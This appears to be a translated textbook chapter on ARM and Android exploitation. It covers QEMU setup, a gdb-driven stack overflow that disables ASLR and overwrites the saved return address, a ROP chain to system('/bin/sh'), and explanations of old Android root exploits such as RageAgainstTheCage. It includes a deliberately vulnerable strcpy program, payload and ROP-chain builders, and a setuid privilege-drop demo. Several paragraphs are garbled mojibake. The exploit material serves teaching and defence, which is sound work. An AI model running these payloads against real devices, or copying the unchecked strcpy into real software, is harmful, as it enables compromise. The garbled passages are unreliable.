Author: Aditya Gupta
Translator: 飞龙
License: CC BY-NC-SA 4.0
In this chapter we will cover the basics of ARM processors and the kinds of vulnerabilities that exist in the ARM world. We will go on to exploit these vulnerabilities so that the whole picture becomes clear. We will also look at a number of Android root exploits and the underlying vulnerabilities they are built on. Since most Android smartphones today use ARM-based processors, a penetration tester must understand ARM and the security risks that come with it.
ARM is a Reduced Instruction Set Computing (RISC) architecture, which means it has far fewer instructions than a Complex Instruction Set Computing (CISC) machine. ARM processors are found in almost every device around us: smartphones, televisions, e-book readers, and a great many other embedded devices.
ARM ×ܹ²ÓÐ 16 ¸ö¿É¼ûµÄͨÓüĴæÆ÷£¬Îª R0-R15¡£ ÔÚÕâ 16 ¸öÖУ¬ÓÐ 5 ¸öÓÃÓÚÌØÊâÄ¿µÄ¡£ ÒÔÏÂÊÇÕâÎå¸ö¼Ä´æÆ÷¼°ÆäÃû³Æ£º
R11: Ö¡Ö¸Õë (FP) R12: ¹ý³ÌÄڼĴæÆ÷ (IP) R13: Õ»Ö¸Õë (SP) R14: Á´½Ó¼Ä´æÆ÷ (LR) R15: ³ÌÐò¼ÆÊýÆ÷ (PC)ÏÂÃæµÄͼչʾÁË ARM ¼Ü¹¹£º
Of these five, we will concentrate on three:
- Stack Pointer (SP): holds the address of the top of the stack
- Link Register (LR): holds the return address when a subroutine is entered (the bl instruction writes it)
- Program Counter (PC): holds the address of the instruction being fetched
Note: one thing to keep in mind is that reading PC does not give the address of the instruction currently executing. Because of the three-stage pipeline (fetch, decode, execute), it points two instructions ahead: the current address plus 8 in ARM state, plus 4 in Thumb state. To control the program flow we need to control the value that ends up in PC, either directly or through LR (a saved LR that we overwrite on the stack becomes PC when the function returns).
ARM has two execution states:
- ARM state: every instruction is 32 bits wide
- Thumb state: instructions are mostly 16 bits wide
Which state the processor is in is recorded by the T bit of the CPSR register; a bx or blx to an address whose low bit is set switches to Thumb state. Thumb-2 is sometimes described as a third mode, but it is really an extension of the Thumb instruction set that mixes 16-bit and 32-bit encodings and still runs in Thumb state. The differences between ARM and Thumb code are beyond the scope of this book and are not covered further in this chapter; the one practical consequence for exploitation is that a return address or gadget address must carry the correct low bit for the state the code expects.
Before we start exploiting vulnerabilities on the ARM platform, it is a good idea to set up an environment for it. Although the emulator in the Android SDK can emulate the ARM platform, and most smartphones are ARM-based, we will begin our ARM exploitation by setting up QEMU, an open source hardware virtualizer and emulator.
To carry out the following steps on an Android emulator or device instead, you would need to download the Android NDK and use its toolchain to compile the binaries for the Android platform. On a Mac, installing QEMU is easy: brew install qemu does it. Here we will set up QEMU on an Ubuntu system. Follow these steps:
The first step is to install QEMU's build dependencies and download its source, as shown (1.7.0 is the release used here; a current release, or the distribution package qemu-system-arm, works just as well):
sudo apt-get build-dep qemu
wget http://wiki.qemu-project.org/download/qemu-1.7.0.tar.bz2
Next we configure QEMU for the ARM target and build it. Extract the archive, change into the directory, and run:
./configure --target-list=arm-softmmu
make && make install
Once QEMU is installed, we can download a Debian image for the ARM platform to practise on. The files are listed at http://people.debian.org/~aurel32/qemu/armel/.
We download the disk image in qcow2 format, the QEMU disk image format, which holds our operating system: debian_squeeze_armel_standard.qcow2. The kernel is vmlinuz-2.6.32-5-versatile and the RAM disk is initrd.img-2.6.32-5-versatile. With all the files downloaded, we start the QEMU instance with:
qemu-system-arm -M versatilepb -kernel vmlinuz-2.6.32-5-versatile -initrd initrd.img-2.6.32-5-versatile -hda debian_squeeze_armel_standard.qcow2 -append 'root=/dev/sda1' --redir tcp:2222::22
The -redir option sets up port forwarding in QEMU's user-mode networking: TCP port 2222 on the host is forwarded to port 22 in the guest, so we can reach the guest's SSH server. Recent QEMU releases have removed -redir; the equivalent is -net user,hostfwd=tcp::2222-:22 -net nic.
Once the guest has booted, we log in to the Debian instance over SSH with:
ssh root@[ip address of Qemu] -p 2222
Because the forwarded port lives on the host, the address here is normally the host itself, that is, localhost. You will be prompted for the username and password; the default credentials are root:root. After logging in we see a screen similar to the following screenshot:
In simple terms, a buffer is a place where data of any kind is stored. An overflow occurs when more data is written into the buffer than the buffer can hold, so the excess spills into whatever lies next to it in memory; on the stack that includes the saved return address. An attacker can use such an overflow to take control of the program and execute a malicious payload.
Let's take a simple program and see how we can exploit it. The program in the following screenshot has three functions: vulnerable, ShouldNotBeCalled, and main. This is the program we are going to exploit:
The ShouldNotBeCalled function is never called during a normal run of the program.
The vulnerable function simply copies the argument passed to it into a fixed-size buffer with strcpy, without checking its length. Before compiling the program, we disable ASLR so that the addresses we see in the debugger stay the same from run to run, and we compile with debugging symbols:
echo 0 > /proc/sys/kernel/randomize_va_space
gcc -g buffer_overflow.c -o buffer_overflow
Writing to /proc/sys/kernel/randomize_va_space requires root, which we already are in this Debian guest. On a distribution whose gcc enables stack canaries by default (Ubuntu does), add -fno-stack-protector, otherwise the canary check aborts the program before the overwritten return address is ever used.
Next we load the binary into the GNU debugger, GDB, and start debugging it:
gdb -q buffer_overflow
Now we can use the disass command to disassemble a particular function, here ShouldNotBeCalled, as in the following screenshot:
As the screenshot shows, the ShouldNotBeCalled function starts at address 0x00008408. Looking at the disassembly of main, we see that vulnerable is called at 0x000084a4, so the return address saved in LR is 0x000084a8, the instruction after the call. vulnerable copies its argument with strcpy, which never checks the length of the string against the size of the destination buffer, so a long enough argument overwrites the saved LR on the stack. If we control the saved LR of the subroutine, we control the program flow from the moment it returns.
The goal is to find the offset at which the saved LR gets overwritten, and then place the address of ShouldNotBeCalled there so that the return jumps into ShouldNotBeCalled. Let's run the program with a long argument and watch what happens. Before that, we set breakpoints on the vulnerable function and on the address of the strcpy call:
b vulnerable
b *<address of the strcpy call>
With the breakpoints in place, we run the program with the argument AAAABBBBCCCC and see how the stack gets overwritten. The first breakpoint hits at the entry of vulnerable, and the next one at the strcpy call. Once we are there, we can examine the stack with the x command, starting at the address held in SP, as in the following screenshot:
We can see that the stack has been overwritten with the buffer we supplied (in ASCII, 0x41 is A, 0x42 is B, and so on). The screenshot also shows that we need four more bytes before we reach the return address, which in this case is 0x000084a8.
So the final string is 16 bytes of junk followed by the address of ShouldNotBeCalled, run from gdb like this:
r `printf 'AAAABBBBCCCCDDDD\x08\x84'`
In the following screenshot we can see that the starting address of ShouldNotBeCalled has been appended to the argument:
Note that the bytes are written in reverse order because this system runs little-endian: the lowest-order byte of the address goes first. Only the two non-zero bytes need to be supplied. strcpy stops copying at the first NUL byte, and the NUL it writes, plus the untouched high byte of the original 0x000084a8, provide the two zero bytes of 0x00008408 for free. A target address with a zero byte below a non-zero byte could not be delivered through strcpy, because the copy would stop at that zero. When we run it, we see that ShouldNotBeCalled gets called, as in the following screenshot:
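The following program is an added example, not the book's buffer_overflow.c (which the page shows only as a screenshot). It reconstructs the kind of program exploited above under the assumption that the vulnerable function copies into a small fixed buffer, puts a bounded replacement for the strcpy next to it, and builds the 16-bytes-of-junk-plus-little-endian-address payload so that the point at which strcpy stops copying can be checked before trying it in gdb. The buffer size is an assumption chosen for the example; the target address 0x00008408 and the 16-byte padding follow the chapter's numbers, and on your own build the offset must be re-measured in gdb.

```c
#include <stdio.h>
#include <stdint.h>
#include <stddef.h>
#include <string.h>

void ShouldNotBeCalled(void) {
    puts("ShouldNotBeCalled() reached");
}

/* Deliberately vulnerable, mirroring the chapter's program: strcpy() copies
 * until the first NUL byte of arg and never looks at sizeof buff, so a long
 * argument runs over the saved registers above buff, including the saved LR. */
void vulnerable(const char *arg) {
    char buff[8];                   /* assumption: size chosen for this example */
    strcpy(buff, arg);
}

/* Hardened replacement: refuses input that does not fit, terminator included.
 * Returns 0 on success, -1 when src is too long for a buffer of cap bytes. */
int bounded_copy(char *dst, size_t cap, const char *src) {
    size_t n = strlen(src);
    if (cap == 0 || n >= cap) return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Write pad bytes (AAAABBBBCCCCDDDD... pattern) followed by target in
 * little-endian byte order. Returns the payload length, 0 if out is too small. */
size_t build_payload(uint8_t *out, size_t cap, size_t pad, uint32_t target) {
    if (cap < pad + 4) return 0;
    for (size_t i = 0; i < pad; i++)
        out[i] = (uint8_t)('A' + (i / 4) % 26);   /* four of each letter, like the gdb run */
    out[pad + 0] = (uint8_t)(target & 0xff);
    out[pad + 1] = (uint8_t)((target >> 8) & 0xff);
    out[pad + 2] = (uint8_t)((target >> 16) & 0xff);
    out[pad + 3] = (uint8_t)((target >> 24) & 0xff);
    return pad + 4;
}

/* How much of the payload strcpy() would actually copy: it stops at the first
 * 0x00 byte, so an address's zero bytes can only be delivered if they sit
 * above all its non-zero bytes (0x00008408 works, 0x00840008 would not). */
size_t strcpy_reach(const uint8_t *payload, size_t len) {
    size_t n = 0;
    while (n < len && payload[n] != 0) n++;
    return n;
}

int main(int argc, char **argv) {
    uint8_t p[32];
    size_t n = build_payload(p, sizeof p, 16, 0x00008408u);
    printf("payload is %zu bytes; strcpy() copies %zu of them before the NUL\n",
           n, strcpy_reach(p, n));
    /* To reproduce the chapter's run on the ARM guest:
     *   ./buffer_overflow "$(printf 'AAAABBBBCCCCDDDD\x08\x84')" */
    if (argc > 1) vulnerable(argv[1]);
    return 0;
}
```

strcpy_reach reports 18 for the chapter's payload: the 16 pad bytes plus 0x08 and 0x84. The third byte of the saved LR is overwritten by strcpy's own terminating NUL and the fourth byte keeps its original 0x00, which is why the two-byte printf above yields the full 0x00008408.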
In most real cases we do not want to call some other function that already exists in the program. Instead we want to place shellcode in our attack vector and have it carry out whatever malicious action the shellcode specifies. But on most ARM-based devices the writable regions of memory, the stack included, are mapped non-executable (ARM's XN bit, the equivalent of NX), so shellcode placed in a buffer cannot be run.
Attackers therefore rely on return-oriented programming (ROP): chaining together short fragments of instructions that already exist in executable memory (the program or its libraries) so that, taken together, they perform the action we want, for example calling system() with a shell command or, as a first stage, making a region executable so that shellcode can run after all. These fragments are called ROP gadgets. To chain gadgets, each one must end in an instruction that transfers control to a location we choose, on ARM typically pop {..., pc} or pop {..., lr} followed by bx lr, so that the address of the next gadget is taken from the stack we overwrote.
ÀýÈ磬Èç¹ûÎÒÃÇÔÚÖ´ÐгÌÐòʱ·´»ã±àseed48()£¬ÎÒÃǽ«×¢Òâµ½ÒÔÏÂÊä³ö£º
Èç¹ûÎÒÃDz鿴·´»ã±à£¬ÎÒÃǽ«×¢Òâµ½Ëü°üº¬Ò»¸ö ADD Ö¸ÁºóÃæ¸ú×ÅÒ»¸ö POP ºÍ BX Ö¸ÁÕâÊÇÒ»¸öÍêÃÀµÄ ROP gadget¡£ ÕâÀ¹¥»÷Õß¿ÉÄÜ»áÏëµ½£¬ÎªÁ˽«ÆäÓÃ×÷ ROP gadget£¬Ê×ÏÈÌøµ½¿ØÖÆ r4 µÄ POP Ö¸ÁȻºó½«±È/bin/shµÄµØÖ·Ð¡ 6 µÄÖµ·ÅÈë r4 ÖУ¬½« ADD Ö¸ÁîµÄÖµ·ÅÈë LR ÖС£ Òò´Ë£¬µ±ÎÒÃÇÌø»Øµ½ ADD Ò²¾ÍÊÇR0 = R4 + 6ʱ£¬ÎÒÃǾÍÓµÓÐÁË/bin/shµÄµØÖ·£¬È»ºóÎÒÃÇ¿ÉÒÔΪ R4 Ö¸¶¨ÈκÎÀ¬»øµØÖ·²¢ÇÒΪ LR Ö¸¶¨system()µÄµØÖ·¡£
ÕâÒâζ×ÅÎÒÃǽ«×îÖÕÌø×ªµ½Ê¹ÓòÎÊý/bin/shµÄsystem()£¬Õ⽫ִÐÐ shell¡£ ÒÔͬÑùµÄ·½Ê½£¬ÎÒÃÇ¿ÉÒÔ´´½¨ÈκΠROP gadget£¬²¢Ê¹ÆäÖ´ÐÐÎÒÃÇËùÐèÒªµÄÈκζ«Î÷¡£ ÓÉÓÚ ROP ÊÇ¿ª·¢ÖÐ×ÔÓµÄÖ÷ÌâÖ®Ò»£¬Òò´ËÇ¿ÁÒ½¨ÒéÄã×Ô¼º³¢ÊÔ£¬·ÖÎö·´»ã±à´úÂë²¢¹¹½¨Â©¶´¡£
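The ROP chain just described, as an added example that is not part of the book: it lays out the stack words the two seed48() gadgets will pop, and then walks through the chain with a minimal register model so that the order of the values (r4 first, then lr) and the r4 = address-of-/bin/sh minus 6 trick can be checked before the payload is fired. All four addresses are hypothetical placeholders (assumption); on a real target you read them from gdb with ASLR disabled, and the low bit of each gadget address must match the state (ARM or Thumb) of the gadget.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define PAD_BYTES 16u   /* junk before the saved LR slot, as measured in the chapter */

/* Hypothetical addresses (assumption), stand-ins for values read in gdb. */
#define ADDR_GADGET_ADD 0x4009a1a8u /* inside seed48: add r0, r4, #6            */
#define ADDR_GADGET_POP 0x4009a1acu /* the following pop {r4, lr} ; bx lr       */
#define ADDR_SYSTEM     0x400e3c00u /* system() in libc                          */
#define ADDR_BINSH      0x40126f40u /* "/bin/sh" string inside libc              */
#define JUNK            0x41414141u

static void put32le(uint8_t *out, uint32_t v) {
    out[0] = (uint8_t)v; out[1] = (uint8_t)(v >> 8);
    out[2] = (uint8_t)(v >> 16); out[3] = (uint8_t)(v >> 24);
}
static uint32_t get32le(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Lay out the overflow payload: pad, then the words the gadgets will pop.
 * Returns the payload length, or 0 if the buffer is too small. */
size_t build_rop_chain(uint8_t *out, size_t cap) {
    const uint32_t words[] = {
        ADDR_GADGET_POP,   /* overwrites vulnerable()'s saved LR: first gadget   */
        ADDR_BINSH - 6,    /* popped into r4                                     */
        ADDR_GADGET_ADD,   /* popped into lr; bx lr -> add r0, r4, #6            */
        JUNK,              /* popped into r4 on the second pass through the pop  */
        ADDR_SYSTEM,       /* popped into lr; bx lr -> system(r0 = "/bin/sh")    */
    };
    size_t n = sizeof words / sizeof words[0];
    if (cap < PAD_BYTES + 4 * n) return 0;
    memset(out, 'A', PAD_BYTES);
    for (size_t i = 0; i < n; i++) put32le(out + PAD_BYTES + 4 * i, words[i]);
    return PAD_BYTES + 4 * n;
}

/* Minimal model of the two gadgets. Returns 1 if control reaches system()
 * with r0 pointing at "/bin/sh", 0 otherwise. sp starts at the saved-LR slot,
 * exactly where vulnerable()'s epilogue pops its return address. */
int run_chain(const uint8_t *payload, size_t len) {
    uint32_t r0 = 0, r4 = 0, lr = 0, pc;
    size_t sp = PAD_BYTES;
    if (len < PAD_BYTES + 4) return 0;
    pc = get32le(payload + sp); sp += 4;          /* vulnerable() "returns" into gadget 1 */
    for (int step = 0; step < 8; step++) {
        if (pc == ADDR_GADGET_ADD) {              /* add r0, r4, #6 ; falls through to the pop */
            r0 = r4 + 6;
            pc = ADDR_GADGET_POP;
        } else if (pc == ADDR_GADGET_POP) {       /* pop {r4, lr} ; bx lr */
            if (sp + 8 > len) return 0;
            r4 = get32le(payload + sp); sp += 4;
            lr = get32le(payload + sp); sp += 4;
            pc = lr;
        } else if (pc == ADDR_SYSTEM) {
            return r0 == ADDR_BINSH;
        } else {
            return 0;                             /* jumped somewhere we do not control */
        }
    }
    return 0;
}

int main(void) {
    uint8_t payload[64];
    size_t n = build_rop_chain(payload, sizeof payload);
    printf("chain is %zu bytes; reaches system(\"/bin/sh\"): %s\n",
           n, run_chain(payload, n) ? "yes" : "no");
    return 0;
}
```

The model deliberately stops on any address it does not know: if the pad length or the word order is wrong, the walk ends at junk instead of at system(), which is the same symptom you would see as a crash on the target.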
Starting with the early versions of Android, root exploits have appeared for each subsequent version and for the builds of the various Android device manufacturers. Rooting an Android device simply means obtaining privileged (root) access to it, which device manufacturers do not grant to users by default. These root exploits abuse a variety of vulnerabilities in the Android system. The following is a list of some of them, with the idea each exploit is based on:
- Exploid: based on CVE-2009-1185 in udev, the component that handles device hotplug events such as USB connections (Android's init reused this code). udev did not verify that the Netlink messages it received (the messages the Linux kernel uses to talk to user space) really came from the kernel rather than being forged by an attacker. So an attacker could simply send a crafted udev message from user space and escalate privileges.
- Gingerbreak: another exploit in the same spirit as Exploid, based on a vulnerability in vold, the volume daemon, which also acted on Netlink messages it received without adequate validation.
- RageAgainstTheCage: based on RLIMIT_NPROC, which sets the maximum number of processes a user may own; a setuid() to a user that has already reached the limit fails. The adb daemon starts as root and then drops its privileges with setuid(). If the maximum number of processes for the target user has already been reached, the setuid() call fails, and because adbd did not check its return value it simply carried on running as root.
- Zimperlich: uses the same idea as RageAgainstTheCage, but relies on the zygote process failing to drop its root privileges.
- KillingInTheNameOf: exploits a vulnerability in the ashmem (Android shared memory) interface to change the value of the ro.secure property, which decides whether adbd drops its root privileges.
These are some of the best-known Android exploits used to root Android devices.
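The privilege-drop mistake behind RageAgainstTheCage and Zimperlich, as an added example that is not Android's adbd or zygote code: a generic daemon pattern in which the return value of setuid() is ignored, next to the corrected version. The setuid/getuid calls are injected through function pointers and backed by a constructed simulation (assumption), so the EAGAIN failure that a saturated RLIMIT_NPROC produces can be reproduced without actually exhausting the process limit or running as root; the target uid 2000 is likewise an assumption (it is the shell uid on Android).

```c
#include <errno.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Constructed simulation of the kernel state (assumption, for offline use):
 * the process starts as uid 0, and a flag says whether the target uid has
 * already reached its RLIMIT_NPROC limit, in which case setuid() fails with
 * EAGAIN just as the real call does. */
static uid_t sim_uid = 0;
static int   sim_target_at_nproc_limit = 0;

int sim_setuid(uid_t u) {
    if (u != 0 && sim_target_at_nproc_limit) { errno = EAGAIN; return -1; }
    sim_uid = u;
    return 0;
}
uid_t sim_getuid(void) { return sim_uid; }

/* Vulnerable pattern: the daemon asks to drop privileges and never looks at
 * the answer. Returns 1 ("go on serving clients") unconditionally. */
int drop_privs_unchecked(int (*do_setuid)(uid_t), uid_t target) {
    do_setuid(target);
    return 1;
}

/* Corrected pattern: check the return value, then verify the identity really
 * changed, and refuse to serve (return 0) if we are still root. */
int drop_privs_checked(int (*do_setuid)(uid_t), uid_t (*do_getuid)(void), uid_t target) {
    if (do_setuid(target) != 0) {
        perror("setuid");          /* EAGAIN here is the RageAgainstTheCage condition */
        return 0;
    }
    if (do_getuid() != target || do_getuid() == 0) return 0;
    return 1;
}

#define TARGET_UID 2000  /* assumption: an unprivileged uid (2000 is AID_SHELL on Android) */

/* One run of the daemon start-up. nproc_full=1 models the attacker having
 * forked enough processes as TARGET_UID to hit RLIMIT_NPROC before the daemon
 * restarts. Returns 1 if the daemon ends up serving while still uid 0. */
int daemon_serves_as_root(int fixed, int nproc_full) {
    sim_uid = 0;
    sim_target_at_nproc_limit = nproc_full;
    int serving = fixed ? drop_privs_checked(sim_setuid, sim_getuid, TARGET_UID)
                        : drop_privs_unchecked(sim_setuid, TARGET_UID);
    return serving && sim_getuid() == 0;
}

int main(void) {
    printf("unchecked, limit hit : serves as root = %d\n", daemon_serves_as_root(0, 1));
    printf("checked,   limit hit : serves as root = %d\n", daemon_serves_as_root(1, 1));
    printf("checked,   no limit  : serves as root = %d\n", daemon_serves_as_root(1, 0));
    return 0;
}
```

Passing the real setuid and getuid in place of the simulated ones turns drop_privs_checked into a usable routine; the second check (identity actually changed, and not root) is there because a silently failed drop is exactly the state these exploits depend on.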
In this chapter we looked at the different ways of exploiting Android and ARM. Hopefully this chapter is a good starting point for anyone who wants to go deeper into ARM exploitation.
In the next chapter we will learn how to write an Android penetration testing report.